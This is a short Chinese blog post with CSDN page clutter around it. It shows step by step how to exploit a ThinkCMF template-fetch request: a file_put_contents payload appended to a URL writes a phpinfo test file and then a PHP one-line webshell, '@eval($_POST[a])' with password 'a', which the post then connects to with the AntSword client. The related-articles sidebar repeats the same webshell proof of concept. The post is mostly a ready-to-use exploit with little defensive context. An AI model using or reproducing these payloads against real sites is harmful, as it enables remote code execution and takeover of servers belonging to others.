2020-09-16

最新推荐文章于 2024-05-30 09:02:27 发布
最新推荐文章于 2024-05-30 09:02:27 发布
阅读量122 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ao52426055/article/details/108619232
版权

在这里插入图片描述
在连接后面写入一个一句话木马

?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘test.php’,’<?php phpinfo(); ?>’)

//生成test.php 文件内容为 <?php phpinfo(); ?>

当我们访问 /test.php 执行<?php phpinfo(); ?> 输出phpinfo()

创建自己的webshell
1.<?php @eval($_POST[a]);?>

在服务器上写入webshell
?a=fetch&templateFile=public/index&prefix=’’&content=file_put_contents(‘t.php’,’<?php @eval($_POST[a]);?>’)

密码为a

t.php 文件内容为 <?php @eval($_POST[a]);?>

连接蚁剑
webshell(一句话)地址

咸鱼壹号
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php file_put_contents(",PHP中危险的file_put_contents函数详解
weixin_30066287的博客
03-12 492
前言最近在EIS上遇到一道文件上传的题,发现过滤了来看下file_put_contents函数第二个参数data的官网定义:data要写入的数据。类型可以是 string,array 或者是 stream 资源(如上面所说的那样)。如果 data 指定为 stream 资源,这里 stream 中所保存的缓存数据将被写入到指定文件中,这种用法就相似于使用 stream_copy_to_stream...
ThinkCMF框架任意文件包含漏洞学习复现小记
Junior_Q的博客
10-10 1170
前言 跟随大佬学习,了解学习了ThinkCMF任意文件包含漏洞,并进行了一次渗透,下面来写个学习笔记记录一下 影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 漏洞危害 任何人在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 实战 因为是学习,所以直接fofa语法搜索‘app=“ThinkCMF”’,虽然搜索出来很多,但找到一个确实有漏洞的还要花很长时间, 下面
ffmpeg-2020-09-16-git-c79f07cc0c-full_build.zip
09-19
There are 4 Windows builds available: git full - built from master branch with a large set of libraries git essentials - built from master branch with commonly-used libraries release full - built from latest release branch with a large set of libraries release essentials - built from latest release
thinkcmfx漏洞太大_ThinkCMF 2.x漏洞合集
weixin_39938724的博客
12-22 341
本文说的是ThinkCMF 2系列,包含ThinkCMF 2.2.3漏洞,其它ThinkCMF 1.6.0从SQL注入到任意代码执行前台用户文章编辑提交存在注入前台的文章编辑中操作框架注入,所以可以直接sql注入url:http://thinkcmf.test/index.php?g=Portal&m=Article&a=edit_postpost:term:123post[pos...
一句话木马(蚁剑)
热门推荐
qq_35856778的博客
09-16 1万+
一、一句话木马 <?php @eval($_POST[a]);?> $_POST[这里是连接密码] 二、利用poc在网站目录下插入文件 ?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('1.php','<?php @eval($_POST[a]); ?>')</php> 将这条代码放到域名后面 三、获取权限 ...
2020-05-09
zero_one666的博客
05-09 1460
1/The easiest thing in the world is persistence. The hardest thing is persistence. Keep in mind that persistence is victory. 2/The idea of breaking at a stroke is not a dream.
2020-06-09
zh1775825464的博客
06-09 694
应该或者说必须努力下去,这只是为了生存得有意义一点,现在也许可以出错,那就去试试看,至少去做过了一些事情,有一天发现自己真的应该去试试的时候,有可能又有其他原因会让你不再敢去了,或是自身的原因,或是家庭的原因,或是环境的原因,有些年纪是可以让人去碰壁的年纪,如果结果不美好,那你至少也是经历过的,不是吗? ...
2020-07-09
arb1001的博客
07-09 670
Flink windowOperator源码解析 待完成
2020-09-22
itlijinping_zhang的博客
09-22 3141
注意: 调用者要被spring管理 方式一 注解@PostConstruct import com.example.javautilsproject.service.AutoMethodDemoService; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.stereotype.Component; import javax.annotation.PostConst
2020-06-03
zhao_shaoye的博客
06-03 1176
Laravel中表单csrf保护**{{csrf_field()}}**
20200916-2020年中国共享出行行业概览(2020-09-16).pdf
04-16
20200916-2020年中国共享出行行业概览(2020-09-16).pdf
wayou#wayou.github.io#2020-09-16-iTerm2 安装 SF Mono 字体1
07-25
最后发现,应该是字体问题,查看 Terminal 所用字体,为 SF Mono:mac 自带 Terminal 的设置这就简单了,但当我准备去 iTerm2 字
基于Cmake编译Qt第三方库-Opencv库及其在Qt的配置【2020-09-16
09-16
windows系统下,使用cmake, 基于Qt5.12.0 mingw 64位版本,编译Opencv3.4.11版本,生成Qt使用的第三方opencv库文件。详细讲述了从编译,以及编译中遇到的问题处理,以及Qt中使用第三方库的问题
UCD 2020-09-30 09:16:02-数据集
03-20
ucddb002_lifecard.edf.csv ucddb002.rec.csv ucddb003_lifecard.edf.csv ucddb003.rec.csv ucddb005_lifecard.edf.csv ucddb005.rec.csv ucddb006_lifecard.edf.csv ucddb007_lifecard.edf.csv ...
登录安全分析报告:小米官网注册
Explinks的博客
05-29 929
图形验证及交互验证方式的安全性到底如何?请看具体分析。
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 994
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受未经授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
导线防碰撞警示灯:高压线路安全保障
最新发布
dxzhkj888888的博客
05-30 270
同时,警示灯的反光材料也起到了至关重要的作用,无论是白天还是夜晚,都能将光线反射到最远的距离,让警示效果倍增。导线防碰撞警示灯也叫高压线太阳能警示灯、户外高压线路夜间红色闪光灯,以其独特的设计和卓越的性能,成为了电力安全领域的保障。在广袤的大地上,高压线路如同血脉般纵横交错,然而,在这看似平静的电力输送背后,却隐藏着不容忽视的安全隐患。而到了夜晚,警示灯便开始了它的使命。导线防碰撞警示灯的出现,使得那些驾驶超高车辆、操作超高施工机械的司机们,也在警示灯的提醒下,更加谨慎地行驶和操作,避免了可能发生的危险。
网络学习(九)|深入解析Cookie与Session:高级应用及安全实践
weixin_44435110的博客
05-28 667
通过本以上,后端开发人员可以深入了解Cookie和Session的高级应用、常见问题及其解决方案,有助于设计和实现高效、安全的会话管理系统。
内网安全-隧道搭建&穿透上线&内网穿透-nps自定义上线&内网渗透-Linux上线-cs上线Linux主机
rumil的博客
05-28 1503
nps内网穿透工具是一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器,带有强大的web管理端。 内网渗透-CS上线Linux主机-Linux上线
INSERT INTO `借阅表` VALUES (100001,'123413','0001','2020-11-05',NULL,'借阅'), (100002,'223411','0002','2020-9-28',2020-10-13,'已还'), (100003,'321123','1001','2020-7-01',NULL,'过期'), (100004,'321124','2001','2020-10-09',2020-10-14,'已还'), (100005,'321124','0001','2020-10-15',NULL,'借阅'), (100006,'223411','2001','2020-10-16',NULL,'借阅'), (100007,'411111','1002','2020-9-01',2020-9-24,'已还'), (100008,'411111','0001','2020-9-25',NULL,'借阅'), (100009,'411111','1001','2020-10-08',NULL,'借阅');
05-11
- 借阅编号:100004,读者编号:321124,书籍编号:2001,借阅日期:2020-10-09,归还日期:2020-10-14,借阅状态:已还 - 借阅编号:100005,读者编号:321124,书籍编号:0001,借阅日期:2020-10-15,归还日期:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值